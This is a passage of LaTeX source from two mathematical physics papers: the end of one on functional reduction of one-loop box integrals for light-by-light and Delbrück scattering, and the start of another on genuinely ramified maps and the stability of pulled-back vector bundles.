M^2_2=\frac{\tilde{s}_{24}\tilde{s}_{13}}{(\tilde{s}_{24}+\tilde{s}_{13})},~~~~~~~\tilde{s}_{ij}=\frac{s_{ij}}{4}.
\end{equation}
The resulting formula (\ref{boxLbyL}) represents the integral $I_4^{(d)}$ depending on three variables
in terms of integrals also depending on three variables.
However, calculating the integral $L^{(d)}$ is simpler than calculating
the original integral.
We will consider different methods of calculating $L^{(d)}$.
It turns out that the recurrence equation with respect to
$d$ provides an easy way to derive a compact expression
for the function $L^{(d)}$.
Such an equation
for the integral $L^{(d)}(\tilde{s}_{ij},M_2^2,m^2)$ has the form
\cite{Tarasov:2022clb}:
\begin{equation}
(d-3)L^{(d+2)}(\tilde{s}_{ij},M_2^2,m^2)
=-2 m^2_0 L^{(d)}(\tilde{s}_{ij},M_2^2,m^2)-I_3^{(d)}(m^2;\tilde{s}_{ij}),
\label{dim_rec_os}
\end{equation}
where
\begin{equation}
I_3^{(d)}(m^2;\tilde{s}_{ij})=
I_3^{(d)}(m^2,m^2-\tilde{s}_{ij},m^2; \tilde{s}_{ij},0,-\tilde{s}_{ij}),
\end{equation}
\begin{equation}
m_0^2= m^2-M_2^2.
\end{equation}
The solution of the equation (\ref{dim_rec_os}) can be represented
as
\begin{eqnarray}
&&
L^{(d)}(\tilde{s}_{ij},M^2_2,m^2)
\nonumber \\
&&~~~~~~~
=
\frac{(m_0^2)^{\frac{d}{2}} ~c_4^{(d)}(\tilde{s}_{ij},M^2_2,m^2)}
{\Gamma\left(\frac{d-3}{2}\right) \sin \frac{\pi d}{2}}
-\frac{1}{2m_0^2}\sum_{r=0}^{\infty}
\frac{\left(\frac{d-3}{2}\right)_r}{(-m_0^2)^r}
I_3^{(d+2r)}(m^2;\tilde{s}_{ij}),
\label{solu_dim_rec}
\end{eqnarray}
where
$c_4^{(d+2)}(\tilde{s}_{ij},M^2_2,m^2)=c_4^{(d)}(\tilde{s}_{ij},M^2_2,m^2)$
is an arbitrary periodic function of the parameter $d$.
Using the method of ref. \cite{Tarasov:2015wcd}, we obtained for the integral
$I_3^{(d)}(m^2;\tilde{s}_{ij})$ a simple functional relation
\begin{equation}
I_3^{(d)}(m^2;\tilde{s}_{ij})=
I_3^{(d)}(m^2,m^2,m^2; 4\tilde{s}_{ij},0,0),
\end{equation}
which reduces this integral to the well-known result \cite{Boos:1990rg}
\begin{eqnarray}
I_3^{(d)}(m^2;\tilde{s}_{ij})
=
- \frac{(m^2)^{\frac{d}{2}-3}}{2} \Gamma\left(3-\frac{d}{2}\right)
\Fh32\Fds{1,1,3-\frac{d}{2}}{2,\frac{3}{2}}.
\label{I3small_Mom}
\end{eqnarray}
We find the function $c_4^{(d)}(\tilde{s}_{ij},M^2_2,m^2)$ as a solution
of a differential equation that can be obtained, for example,
from a differential equation
for the integral $L^{(d)}(\tilde{s}_{ij},M_2^2,m^2)$
\begin{eqnarray}
&&\tilde{s}_{ij}\frac{\partial}{\partial \tilde{s}_{ij}}
L^{(d)}(\tilde{s}_{ij},M_2^2,m^2) = -L^{(d)}(\tilde{s}_{ij},M_2^2,m^2)
\nonumber \\
&&~~~~~~~~~~~~~~~
+\frac{(d-3)}{8(M_2^2-\tilde{s}_{ij})(M_2^2-m^2)}I^{(d)}_2(m^2-M_2^2,m^2;M_2^2)
\nonumber \\
&&~~~~~~~~~~~~~~~
-\frac{(d-3)}{8(M_2^2-\tilde{s}_{ij})(\tilde{s}_{ij}-m^2)}
I_2^{(d)}(m^2-\tilde{s}_{ij},m^2;\tilde{s}_{ij})
\nonumber \\
&&~~~~~~~~~~~~~~~
+\frac{(d-2)}{16m^2(\tilde{s}_{ij}-m^2)(M_2^2-m^2)}I_1^{(d)}(m^2).
\label{proI4_S13}
\end{eqnarray}
This equation was obtained under the assumption that $\tilde{s}_{ij}$ and $M_2^2$
are independent variables.
Substituting the solution (\ref{solu_dim_rec}) into the equation (\ref{proI4_S13}),
we get a simple differential equation
\begin{equation}
\tilde{s}_{ij}\frac{\partial c_4^{(d)}(\tilde{s}_{ij},M_2^2,m^2)}
{\partial \tilde{s}_{ij}}+c_4^{(d)}(\tilde{s}_{ij},M_2^2,m^2)=0.
\label{dif_equ4c4}
\end{equation}
The solution of this equation is
\begin{equation}
c_4^{(d)}(\tilde{s}_{ij},M_2^2,m^2)
= \frac{\tilde{c}_4^{(d)}(M_2^2,m^2)}{\tilde{s}_{ij}},
\end{equation}
where $\tilde{c}_4^{(d)}(M_2^2,m^2)$ is the integration constant
of the differential equation (\ref{dif_equ4c4}).
Using the boundary value of the integral $L^{(d)}$ at $\tilde{s}_{ij}=0$, we get
\begin{equation}
c_4^{(d)}(\tilde{s}_{ij},M_2^2,m^2) = 0.
\label{c4zero}
\end{equation}
For the hypergeometric function from the equation (\ref{I3small_Mom}),
we used the following representation \cite{rainville1960special}
\begin{eqnarray}
\Fh32\Fx{1,1,3-\frac{d}{2}}{2,\frac{3}{2}}=\frac{-\Gamma\left(\frac32\right)}
{x \Gamma\left(3-\frac{d}{2}\right) \Gamma\left(\frac{d-3}{2}\right)}
\int_0^1 dz z^{\frac{2-d}{2}}(1-z)^{\frac{d-5}{2}}
\ln(1-xz).~~~~
\label{I3intrepr}
\end{eqnarray}
Employing this representation and taking into account equation (\ref{c4zero}),
the solution (\ref{solu_dim_rec}) can be written as
\begin{eqnarray}
L^{(d)}(\tilde{s}_{ij},M_2^2,m^2) = -
\frac{\pi^{\frac12}(m^2)^{\frac{d}{2}-3}}
{8\tilde{s}_{ij}\Gamma\left(\frac{d-3}{2}\right)}
\int_0^1 \frac{dz ~z^{2-\frac{d}{2}}(1-z)^{\frac{d-5}{2}}}
{1-z\frac{M_2^2}{m^2}}\ln\left(1-z\frac{\tilde{s}_{ij}}{m^2}\right).
\label{I4_LbyL}
\end{eqnarray}
Substituting this expression into the equation (\ref{boxLbyL}), we get
\begin{eqnarray}
&&I_4^{(d)}(m^2,m^2,m^2,m^2; 0,0,0,0,s_{24},s_{13})
=
-\frac{\pi^{\frac12}(m^2)^{\frac{d}{2}-3}}
{2(s_{24}+s_{13})\Gamma\left(\frac{d-3}{2}\right)}
~~~~~~~~~~~
\nonumber \\
&& ~~~~~~~~~~\times
\int_0^1 \frac{dz ~z^{2-\frac{d}{2}}(1-z)^{\frac{d-5}{2}}}
{1-z\frac{M_2^2}{m^2}}
\left[ \ln\left(1-z\frac{s_{13}}{4m^2}\right)+
\ln\left(1-z\frac{s_{24}}{4m^2}\right) \right].~~~
\label{SumI_LbL}
\end{eqnarray}
This is the simplest representation known so far
for this integral. Note that for $d=4$ in ref.
\cite{Davydychev:1993ut}, this integral was obtained
in terms of the hypergeometric Appell function $F_3$,
which was expressed as a two-fold integral.
The representation (\ref{I4_LbyL}) is convenient for
a series expansion in $\varepsilon =(4-d)/2$. For $d=4$, we have
\begin{eqnarray}
L^{(4)}(\tilde{s}_{ij},M_2^2,m^2)=
\frac{-1}{8M_2^2{s}_{ij}\beta_{2}}
\left[
\ln^2\frac{\beta_{ij}+1}{\beta_{2}-\beta_{ij}}
-\frac12 \ln^2\frac{\beta_{2}-\beta_{ij}}{\beta_{2}+\beta_{ij}}
-\ln \frac{\beta_{ij}-1}{\beta_{ij}+1}
\ln\frac{\beta_{2}-\beta_{ij}}{\beta_{2}+\beta_{ij}}
\right.
\nonumber \\
\nonumber \\
\left.
+\frac{\pi^2}{3}
+2\Sp{\frac{\beta_{ij}-\beta_{2}}{\beta_{ij}+1}}
-2\Sp{\frac{\beta_{ij}-1}{\beta_{2}+\beta_{ij}}}
+\Sp{\frac{\beta_{ij}^2-1}{\beta_{ij}^2-\beta_{2}^2}}
\right].~~~~~~~~
\label{I_LbL}
\end{eqnarray}
where
\begin{equation}
\beta_{ij} \equiv \sqrt{1- \frac{m^2}{\tilde{s}_{ij}}},~~~~(ij=13,24) \; \;~~~~~~~~~~~
\beta_{2} \equiv \sqrt{1-\frac{m^2}{M_2^2}}. \;
\label{Betass}
\end{equation}
Using (\ref{I_LbL}), from the equation (\ref{boxLbyL}),
we get
\begin{eqnarray}
&&I_4^{(4)}(m^2,m^2,m^2,m^2; 0,0,0,0,s_{24},s_{13})
\nonumber \\ [0.3 cm]
&& = \frac{1}{8\tilde{s}_{13}\tilde{s}_{24} \beta_{2}}
\left\{ 2 \ln^2
\left( \frac{\beta_{2}+\beta_{13}}{\beta_{2}+\beta_{24}} \right)
+ \ln \left( \frac{\beta_{2}-\beta_{13}}{\beta_{2}+\beta_{13}} \right) \;
\ln \left( \frac{\beta_{2}-\beta_{24}}{\beta_{2}+\beta_{24}} \right)
- \frac{\pi^2}{2} \right. \hspace{1cm}
\nonumber \\
&& \left.
+\sum_{i=13,24}^{} \left[
2 \Sp{\frac{\beta_{i} -1}{\beta_{2}+\beta_i}}
-2 \Sp{-\frac{\beta_{2}-\beta_i}{\beta_{i} +1}}
- \ln^2
\left( \frac{\beta_{i} +1}{\beta_{2}+\beta_i} \right)
\right] \right\}.~~~~~~~~~
\label{I4eps0}
\end{eqnarray}
In the sum of two $L^{(d)}$ the third terms with $\rm Li_2$ from (\ref{I_LbL})
cancel.
The expression (\ref{I4eps0}) agrees with the result obtained in
ref. \cite{Davydychev:1993ut}.
The function $L^{(d)}$ can be obtained as a solution to the equation (\ref{proI4_S13}).
For $d=4$, the solution of this equation has the form
\begin{eqnarray}
&&L^{(4)}(\tilde{s}_{ij},M_2^2,m^2) =
\frac{1}{8s_{ij}M_2^2 \beta_2}
\Biggl[F(y_{ij},y_2)
-2{\rm Li_2}\left(1- y_2\right)
\Biggr],~~~~~~
\label{best_I4LbL}
\end{eqnarray}
where
\begin{equation}
F(y_{ij},y_k)={\rm Li}_2\left(1-y_{ij}y_k\right)+
{\rm Li}_2\left(1-\frac{y_k}{y_{ij}}\right)+\frac12 \ln^2y_{ij},
\end{equation}
\begin{equation}
y_{ij}=\frac{\beta_{ij}-1}{\beta_{ij}+1},~~~~~~y_{2}=\frac{\beta_{2}-1}{\beta_{2}+1}.
\end{equation}
Note that the expression (\ref{best_I4LbL}) is invariant as with respect
to the replacement of $y_{ij}\rightarrow 1/y_{ij}$ and
with respect to the replacement
$y_{2}\rightarrow 1/y_{2}$.
Substituting (\ref{best_I4LbL}) into the formula (\ref{boxLbyL}), we get
\begin{eqnarray}
&&I_4^{(d)}(m^2,m^2,m^2,m^2; 0,0,0,0,s_{24},s_{13})
\nonumber \\
&&~~~~~
=\frac{1}{2 s_{13}s_{24}\beta_2}
\Biggl[
F(y_{13},y_2)+F(y_{24},y_2)-4{\rm Li_2}\left(1- y_2\right)
\Biggr].~~~
\label{five_li}
\end{eqnarray}
Series representations of $L^{(d)}(\tilde{s}_{ij},M_2^2,m^2)$
can be obtained from the integral representations (\ref{int_rep_B4}), (\ref{I4_LbyL}).
\section{
Integral $I_4^{(d)}$ for the photon splitting amplitude}
In this section, we turn to the
integral with one external line off-shell, which is
associated with the diagram $b)$ in Figure 1.
This integral corresponds to the kinematics
\begin{equation}
s_{23}=s_{34}=s_{14}=0,~~~~~~m_i^2=m^2.
\end{equation}
Using the final formula for functional reduction of
$I_4^{(d)}$ from ref. \cite{Tarasov:2022clb}, we get
\begin{eqnarray}
&&(s_{12}-s_{24}-s_{13})I_4^{(d)}(m^2,m^2,m^2,m^2,s_{12},0,0,0,s_{24},s_{13})
\nonumber \\
&& \nonumber \\
&&~~~~= s_{12}
L^{(d)}(\tilde{s}_{12},M_3^2,m^2)-s_{13}L^{(d)}(\tilde{s}_{13},M_3^2,m^2)
-s_{24}
L^{(d)}(\tilde{s}_{24},M_3^2,m^2).~~~~
\end{eqnarray}
where
\begin{equation}
M_3^2=\frac{s_{24}s_{13}}{4(s_{13}+s_{24}-s_{12})}.
\end{equation}
For $d=4$, we have
\begin{eqnarray}
&&I_4^{(4)}(m^2,m^2,m^2,m^2,s_{12},0,0,0,s_{24},s_{13})
\nonumber \\
&& \nonumber \\
&&~~~~~~~~ =\frac{
F(y_{13},y_3)+F(y_{24},y_3)-F(y_{12},y_3)
-2 {\rm Li}_2(1-y_3)}{2{s}_{24}{s}_{13}\beta_3},
\end{eqnarray}
where
\begin{equation}
y_3=\frac{\beta_3-1}{\beta_3+1},~~~~~\beta_3=\sqrt{1-\frac{m^2}{M_3^2}}.
\end{equation}
\section{
Integrals $I_4^{(d)}$ for the Delbr\"{u}ck scattering amplitude
}
We now turn to the more complicated integrals corresponding to the
diagrams $c)$ and $d)$ in Figure 1.
Inserting the values
of masses and kinematic variables for the integral represented by
the diagram $c)$,
\begin{equation}
s_{23}=s_{14}=0,~~~~~m_k^2=m^2, ~~~k=1,...,4,
\end{equation}
in the final formula for the functional reduction of $I_4^{(d)}$ from
ref. \cite{Tarasov:2022clb}, we get
\begin{eqnarray}
&&(s_{12}-s_{13}-s_{24}+s_{34})
I_4^{(d)}(m^2,m^2,m^2,m^2;s_{12},0,s_{34},0,s_{24},s_{13})
\nonumber \\
&&~~~~~~~~~~~~~~~~=
s_{12}L^{(d)}(\tilde{s}_{12},M_4^2,m^2)
-s_{13}L^{(d)}(\tilde{s}_{13},M_4^2,m^2)
\nonumber \\
&&~~~~~~~~~~~~~~~~
-s_{24}L^{(d)}(\tilde{s}_{24},M_4^2,m^2)
+s_{34}L^{(d)}(\tilde{s}_{34},M_4^2,m^2),~~~~~
\end{eqnarray}
where
\begin{eqnarray}
&& M^2_4=\frac{s_{12}s_{34}-s_{13}s_{24}}{4(s_{12}-s_{13}-s_{24}+s_{34})}.
\end{eqnarray}
At $d=4$, we obtain
\begin{eqnarray}
&&
I_4^{(4)}(m^2,m^2,m^2,m^2;s_{12},0,s_{34},0,s_{24},s_{13})
\nonumber \\
&& \nonumber \\
&&~~~~~~~~~~~
=\frac{F(y_{13},y_4)+F(y_{24},y_4)-F(y_{34},y_4)-F(y_{12},y_4)
}
{2({s}_{13}{s}_{24}-{s}_{12}{s}_{34})\beta_4},~~~
\end{eqnarray}
where
\begin{equation}
y_4=\frac{\beta_4-1}{\beta_4+1},~~~~~\beta_4=\sqrt{1-\frac{m^2}{M_4^2}}.
\end{equation}
Another integral contributing to Delbr\"{u}ck
scattering cross section is represented by the diagram $d)$ in Figure 1.
The kinematics corresponding to this diagram reads
\begin{equation}
s_{34}=s_{14}=0,~~~~m_k^2=m^2,~~~~k=1,...4.
\end{equation}
Substituting these values into the final formula for functional
reduction \cite{Tarasov:2022clb}, we obtain
\begin{eqnarray}
&&d_1d_2
I_4^{(d)}(m^2,m^2,m^2,m^2;s_{12},s_{23},0,0,s_{24},s_{13})
\nonumber \\
&&=
\frac12 d_1 s_{13} s_{24}I_4^{(d)}(m_0^2,m^2,m^2-\tilde{s}_{13},m^2)
-\frac12 d_1 s_{23} s_{24}I_4^{(d)}(m_0^2,m^2,m^2-\tilde{s}_{23},m^2)
\nonumber \\
&&
-~\frac12 d_1 s_{12}s_{24} I_4^{(d)}(m_0^2,m^2,m^2-\tilde{s}_{12},m^2)
+d_1 s_{24}^2I_4^{(d)}(m_0^2,m^2,m^2-\tilde{s}_{24},m^2)
\nonumber \\
&&
+~\frac12 n_1 s_{12}(s_{12}-s_{13}-s_{23})
I_4^{(d)}(m_0^2,\tilde{m}^2_0,m^2-\tilde{s}_{12},m^2)
\nonumber \\
&&-~
\frac12 n_1 s_{13}(s_{12}-s_{13}+s_{23})
I_4^{(d)}(m_0^2,\tilde{m}^2_0,m^2-\tilde{s}_{13},m^2)
\nonumber \\
&&-~
\frac12 n_1 s_{23}(s_{12}+s_{13}-s_{23})
I_4^{(d)}(m_0^2,\tilde{m}^2_0,m^2-\tilde{s}_{23},m^2),
\label{I4fig_d}
\end{eqnarray}
where
\begin{equation}
m_0^2 = m^2-\tilde{s}_1,
~~~~~~\tilde{m}^2_0=m^2-\tilde{s}_2,
~~~~~~\tilde{s}_1 = \frac{s_{13}s_{24}^2}{4 d_2},
~~~~~~\tilde{s}_2=-\frac{s_{12}s_{13}s_{23}}{d_1},
\end{equation}
\begin{eqnarray}
&&n_1=2s_{12}s_{23}-s_{12}s_{24}+s_{13}s_{24}-s_{23}s_{24}, \nonumber \\
&&d_1=s_{12}^2+s_{13}^2+s_{23}^2-2 s_{12}s_{13}-2 s_{12}s_{23}-2s_{13}s_{23},
\nonumber \\
&&
d_2=s_{12}s_{23}-s_{12}s_{24}+s_{13}s_{24}-s_{23}s_{24}+s_{24}^2.
\end{eqnarray}
The first four integrals in the equation (\ref{I4fig_d}) are
expressed in terms of the function $L^{(d)}$. The three remaining integrals
$I_4^{(d)}(m_0^2,\tilde{m}^2_0,m^2-\tilde{s}_{ij},m^2)$,
can be calculated using the formula from ref. \cite{Tarasov:2022clb}
\begin{eqnarray}
&&I_4^{(d)}(r_{1234},r_{234},r_{34},r_4)
=
\int_0^1\int_0^1\!\int_0^1\frac{\Gamma\left(4-\frac{d}{2}\right)
x_1^2x_2~ dx_1dx_2dx_3 }
{\left[
a-b x_1^2-c x_1^2x_2^2 -e x_1^2x_2^2x_3^2
\right]^{4-\frac{d}{2}}},~~~~~~~
\label{I4param}
\end{eqnarray}
where
\begin{equation}
a=r_{1234},~~~~~b=r_{1234}-r_{234},~~~~~c=r_{234}-r_{34},
~~~~~e=r_{34}-r_4.
\end{equation}
For $d=4$, the integral (\ref{I4param}) can be calculated as a
combination
of functions $L^{(4)}$ with various arguments. The detailed derivation
of the result will be described in an expanded version of this article.
\section{
Conclusions}
Our results clearly indicate that the application
of the functional reduction method makes it possible to reduce
complicated integrals to simpler integrals.
Even if the number of variables in the integrals resulting from
applying
the functional reduction is the same as in the original integral,
these integrals are simpler than the original integral.
In general, integrals depending on more than four variables
are reduced to a combination of integrals with four or
fewer variables, which are also simpler than the original integral.
The fact that the results for the integrals discussed in this paper are expressed in
terms of the same function $L^{(d)}$ may be useful
for improving the accuracy and efficiency
of calculating radiative corrections.
The integral representation (\ref{I4_LbyL}) can significantly simplify
the calculation of higher order terms in the
$\varepsilon$ expansion of integrals considered in the article.
| 2024-02-18T23:40:18.410Z | 2022-11-29T02:28:26.000Z | algebraic_stack_train_0000 | 2,011 | 3,673 |
|
proofpile-arXiv_065-9864 | \section{Introduction}
Here we continue, from \cite{PS}, \cite{BP1}, \cite{BP2}, the investigations of the direct
image $f_*{\mathcal O}_X$, where $f\, :\, X\, \longrightarrow\, Y$ is a separable finite
surjective map between irreducible normal projective varieties defined over an
algebraically closed field $k$. First we briefly recall the main results of \cite{BP1},
\cite{BP2}.
The above map $f$ is called genuinely ramified if the homomorphism between
\'etale fundamental groups
$$f_*\, \colon \, \pi_1^{\rm et}(X)\,\longrightarrow\, \pi_1^{\rm et}(Y)$$
induced by $f$ is surjective.
Consider the unique maximal pseudostable subbundle ${\mathbb S}\, \subset\, f_*{\mathcal O}_X$;
the existence of this subbundle is proved in \cite{BP2}.
The map $f$ is genuinely ramified if and only if ${\rm rank}({\mathbb S})\,=\, 1$ \cite{BP2}. When
$\dim X\,=\,1\,=\, \dim Y$, this was proved earlier in \cite{BP1}. When
$\dim X\,=\,1\,=\, \dim Y$, if $E$ is a stable vector bundle on $Y$, and $f$ is genuinely ramified, then $f^*E$ is
also stable \cite{BP1}.
Here we prove the following (see Theorem \ref{thm1}):
\begin{theorem}\label{thmi1}
Let $f\, :\, X\, \longrightarrow\, Y$ be a finite separable
surjective map between irreducible normal projective varieties
defined over an algebraically closed field $k$. Then the following four statements
are equivalent.
\begin{enumerate}
\item The map $f$ is genuinely ramified.
\item There is no nontrivial \'etale covering $g\, :\, Y'\,\longrightarrow\, Y$ satisfying the condition
that there is a map $g'\, :\, X\,\longrightarrow\, Y'$ for which $g\circ g'\,=\, f$.
\item The fiber product $X\times_Y X$ is connected.
\item $\dim H^0(X,\, (f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm torsion})\,=\, 1$.
\end{enumerate}
\end{theorem}
This theorem leads to the following generalization, to higher dimensions, of the above mentioned result
for curves (see Theorem \ref{thm2}):
\begin{theorem}\label{thmi2}
Let $f\, :\, X\, \longrightarrow\, Y$ be a finite separable surjective map
between irreducible normal
projective varieties such that $f$ is genuinely ramified. Let $E$ be a stable vector bundle on
$Y$. Then the pulled back vector bundle $f^*E$ is also stable.
\end{theorem}
It should be noted that given a map $f$ as above, if $f^*E$ is a stable vector bundle on $Y$ for a vector bundle $E$ on $X$, then $E$ is stable.
Given a stable vector bundle $E$ on $X$ we may ask for a criterion for it to descend to $Y$ (meaning
a criterion for $E$ to be the pullback of a vector bundle on $Y$). The following criterion is deduced
using Theorem \ref{thmi2} (see Theorem \ref{thm3}):
\begin{theorem}\label{thmi3}
Let $f\, \colon \, X\, \longrightarrow\, Y$ be a genuinely ramified map of irreducible normal
projective varieties. Let $E$ be a stable vector bundle on $X$. Then there is a vector bundle $W$ on $Y$ with
$f^*W$ isomorphic to $E$ if and only if $f_*E$ contains a stable vector bundle $F$ such that
$$
\frac{{\rm degree}(F)}{{\rm rank}(F)}\,=\, \frac{1}{{\rm degree}(f)}\cdot \frac{{\rm degree}(E)}{{\rm rank}(E)}\,.
$$
\end{theorem}
Let $M$ be a smooth projective variety over $k$. If the \'etale fundamental group
of $M$ is trivial, then the stratified fundamental group of $M$ is also trivial \cite{EM}.
Let $f\, :\, M\, \longrightarrow\, {\mathbb P}^d_k$ be a finite
separable map, where $d\,=\, \dim M$.
The above mentioned result of \cite{EM} has the following equivalent reformulation:
If $f$ induces an isomorphism of the \'etale fundamental groups, then it
induces an isomorphism of the stratified fundamental groups. In view of this
reformulation, it is natural to ask the following question:
If $f\, :\, X\, \longrightarrow\, Y$ is a finite separable
surjective map between irreducible normal projective varieties such that the
corresponding homomorphism of the \'etale fundamental groups is surjective, then does
$f$ induce a surjection of the stratified fundamental groups?
We hope that Theorem \ref{thmi2} would shed some light on this question.
\section{Genuinely ramified maps}
Let $k$ be an algebraically closed field; there is no assumption on the characteristic of $k$.
Following \cite{PS}, \cite{BP1}, \cite{BHS} we define:
\begin{definition}\label{def1}
A separable finite surjective map
$$
f\,\, \colon \,\, X\, \longrightarrow\, Y
$$
between irreducible normal projective $k$-varieties is said to be \textit{genuinely ramified}
if the homomorphism between \'etale fundamental groups
$$f_*\, \colon \, \pi_1^{\rm et}(X)\,\longrightarrow\, \pi_1^{\rm et}(Y)$$
induced by $f$ is surjective.
\end{definition}
Let
\begin{equation}\label{e1}
f\, \colon \, X\, \longrightarrow\, Y
\end{equation}
be a separable finite surjective map between irreducible normal projective varieties.
Since $X$ and $Y$
are normal, and $f$ is a finite surjective map, the direct image $f_*{\mathcal O}_X$
is a reflexive sheaf on $Y$ whose rank coincides with the degree of the map $f$.
To define the degree of a torsionfree sheaf on $Y$, we fix a very ample
line bundle $L_Y$ on $Y$. Since $f$ is a finite map, the line bundle $f^*L_Y$ on $X$ is ample.
Equip $X$ with the polarization $f^*L_Y$. In what follows, the degree of the sheaves on
$Y$ and $X$ are always with respect to the polarizations $L_Y$ and $f^*L_Y$ respectively. For
a torsionfree sheaf $F$, define
$$
\mu(F)\,:=\, \frac{{\rm degree}(F)}{{\rm rank}(F)}\,\in\, \mathbb Q\, .
$$
We recall
that a torsionfree sheaf $E$ is called {\it stable} (respectively, {\it semistable}) if for all
subsheaves $V\, \subset\, E$, with $0\,<\, {\rm rank }(V)\,<\, {\rm rank}(E)$, the inequality
$$
\mu(V)\, <\, \mu(E) \ \ {\rm (respectively, }\ \mu(V)\, \leq\, \mu(E){\rm )}
$$
holds. If $E_1\, \subset\, E$ is the first nonzero term of the Harder-Narasimhan filtration of $E$, then
$$
\mu_{\rm max}(E)\,:=\, \mu(E_1)
$$
\cite{HL}. In particular, if $E$ is semistable, then $\mu_{\rm max}(E)\,=\, \mu(E)$.
For any coherent sheaves $E$ and $F$ on $X$ and $Y$ respectively, the projection formula gives
$$
f_*{\rm Hom} (f^* F, \, E)\,=\, f_*((f^*F^*)\otimes E)\,=\, F^*\otimes f_*E\,=\, {\rm Hom}(F,\, f_*E)\, .
$$
Since $f$ is a finite map, this gives the following:
\begin{equation}\label{eq_adjoint}
H^0(X,\, {\rm Hom} (f^* F, \, E))\,=\, H^0(Y,\, f_*{\rm Hom} (f^* F, \, E))\,=\, H^0(Y, \, {\rm Hom}(F, \, f_* E))\, .
\end{equation}
Setting $E\,=\, {\mathcal O}_X$
and $F\,=\,{\mathcal O}_Y$ in \eqref{eq_adjoint} we conclude that the identification $f^*{\mathcal O}_Y\,
\stackrel{\sim}{\longrightarrow}\, {\mathcal O}_X$ produces an inclusion homomorphism
\begin{equation}\label{e0}
{\mathcal O}_Y\, \hookrightarrow\, f_*{\mathcal O}_X\, .
\end{equation}
{}From \eqref{e0} it follows immediately that $\mu_{\rm max}(f_*{\mathcal O}_X)\, \geq\, 0$. In fact,
\begin{equation}\label{e2}
\mu_{\rm max}(f_*{\mathcal O}_X)\, =\, 0
\end{equation}
\cite[Lemma 2.2]{BP1}; although Lemma 2.2 of \cite{BP1} is stated under the assumption that
$\dim Y\,=\,1$, its proof works for all dimensions.
We recall from \cite{BP2} the definition of a pseudo-stable sheaf.
\begin{definition}
A {\it pseudo-stable sheaf} on $Y$ is a semistable sheaf $F$ on $Y$ such that $F$ admits a filtration of subsheaves
\begin{equation}\label{fi1}
0 = F_0 \, \subsetneq \, F_1 \, \subsetneq \, \cdots \, \subsetneq \, F_{n-1} \, \subsetneq \, F_n \, = \, F
\end{equation}
satisfying the condition that $F_i/F_{i-1}$ is a stable reflexive sheaf with $\mu(F_i/F_{i-1})\,=\, \mu(F)$ for
every $1 \,\leq\, i \,\leq \,n$.
A {\it pseudo-stable bundle} on $Y$ is a pseudo-stable sheaf $F$ as above such that
\begin{itemize}
\item $F$ is locally free, and
\item for each $1 \,\leq\, i \,\leq \,n$ the quotient $F_i/F_{i-1}$ in \eqref{fi1} is locally free.
\end{itemize}
\end{definition}
The first one among the above two conditions is actually implied by the second condition.
For the map $f$ in \eqref{e1}
consider the maximal destabilizing subsheaf $HN_1(f_* \mathcal{O}_X)$ of the reflexive coherent sheaf
$f_* \mathcal{O}_X$ on $Y$; in other words, $HN_1(f_* \mathcal{O}_X)$ is the first nonzero term in the
Harder-Narasimhan filtration of $f_* \mathcal{O}_X$. Recall from \eqref{e2} that
$$\mu(HN_1(f_* \mathcal{O}_X)) = \mu_{\rm max}(f_* \mathcal{O}_X) = 0\,.$$
Since $\mathcal{O}_Y \,\subset\, HN_1(f_* \mathcal{O}_X)$ (see \eqref{e0}) is a stable locally free
subsheaf of degree $0$, we conclude that \cite[Theorem 4.3]{BP2} applies to $f_* \mathcal{O}_X$. Let
\begin{equation}\label{e3}
{\mathbb S}\, \subset\, f_*{\mathcal O}_X
\end{equation}
be the unique maximal pseudo-stable bundle of degree zero such that $(f_*{\mathcal O}_X)/{\mathbb S}$
is torsionfree \cite[Theorem 4.3]{BP2}. Note that we have
\begin{equation}\label{t1}
{\mathcal O}_Y\, \subset\,{\mathbb S}.
\end{equation}
\begin{notation}
For any $k$-variety $Z$, and a coherent sheaf $F$ on $Z$, we write
$$
F_{\rm tor} \subset F
$$
for the torsion subsheaf of $F$. Also, define
\begin{equation}\label{en}
H^0_{\mathbb F}(W,\, F)\, :=\, H^0(W,\, F/F_{\rm tor}).
\end{equation}
\end{notation}
In particular,
\begin{equation}\label{e4}
H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)\, = \,
H^0(X,\, (f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor})\, .
\end{equation}
Consider the Cartesian diagram
\begin{equation}\label{e5}
\begin{tikzcd}[row sep=large]
X\times_Y X \arrow[r, "p_2"] \arrow[dr, phantom, "\square"] \ar[d, "p_1"] & X \arrow[d, "f"]\\
X \arrow[r, "\widetilde{f}:=f"] & Y
\end{tikzcd}
\end{equation}
where $p_1$ and $p_2$ are the natural projections to the first and second factors
respectively. Since $f$ is a finite morphism, by the proper
base change theorem of quasi-coherent sheaves we have
\begin{equation}\label{e6}
\widetilde{f}^*f_*{\mathcal O}_X \,=\, f^*f_*{\mathcal O}_X\,=\, (p_1)_* {\mathcal O}_{X\times_Y X}
\end{equation}
(see \cite[Part 3, Ch.~59, \S~59.55, Lemma 59.55.3]{St}).
Pulling back the inclusion map in \eqref{e0} to $X$ we obtain
$$
{\mathcal O}_X \, \subset\, f^*f_*{\mathcal O}_X\, \cong \,(p_1)_* {\mathcal O}_{ X\times_Y X}.
$$
This implies that
\begin{equation}\label{e4b}
\dim H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)\, \geq\, 1
\end{equation}
(see \eqref{e4}).
We can also describe $H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)$ in terms of the cohomology of a sheaf on
the reduced scheme $(X\times_Y X)_{\rm red}$. Let
\begin{equation}\label{cz}
{\mathcal Z}\, \,:=\, \, (X\times_Y X)_{\rm red}\,\, \subset\,\, X\times_Y X
\end{equation}
be the reduced subscheme. So ${\mathcal O}_{\mathcal Z}$ is a quotient of ${\mathcal O}_{X\times_Y X}$.
Let
\begin{equation}\label{ecj}
j \, :\, \mathcal{Z} \, \longrightarrow \, X\times_Y X
\end{equation}
be the closed immersion. Let
\begin{equation}\label{pi}
p'_1,\, p'_2\, \colon \, {\mathcal Z}\,\longrightarrow\,X
\end{equation}
be the restrictions to $\mathcal Z$ of the projections $p_1,\, p_2$ respectively in \eqref{e5}. For $i\,=\, 1,\,
2$, we have $p_i \circ j = p'_i$, where $j$ is the map in \eqref{ecj}. Then
\begin{eqnarray}
(p'_{1})_* {\mathcal O}_{\mathcal Z} & \, = \, & (p_1)_* j_* \mathcal{O}_{\mathcal{Z}}
\nonumber\\
& \, = \, & (p_1)_* (\mathcal{O}_{X\times_Y X}/(\mathcal{O}_{X\times_Y X})_{\rm tor})
